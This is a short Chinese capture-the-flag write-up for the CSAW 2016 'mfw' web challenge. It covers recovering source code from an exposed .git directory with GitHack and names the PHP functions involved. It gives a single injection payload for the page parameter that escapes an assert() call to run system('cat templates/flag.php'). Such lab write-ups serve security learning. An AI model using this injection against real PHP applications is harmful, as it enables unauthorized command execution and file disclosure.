攻防世界Web-mfw


題目來源csaw-ctf-2016-quals

image

image

使用GitHack

image

image

image

image

assert() 檢查一個斷言是否為 FALSE

strpos() 函數查找字符串在另一字符串中第一次出現的位置。

file_exists() 函數檢查文件或目錄是否存在。

payload:

?/page=

about.php', '123') === false and system('cat templates/flag.php') and strpos('templates/flag

查看網頁源代碼

image

知識:git漏洞、代碼審計


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM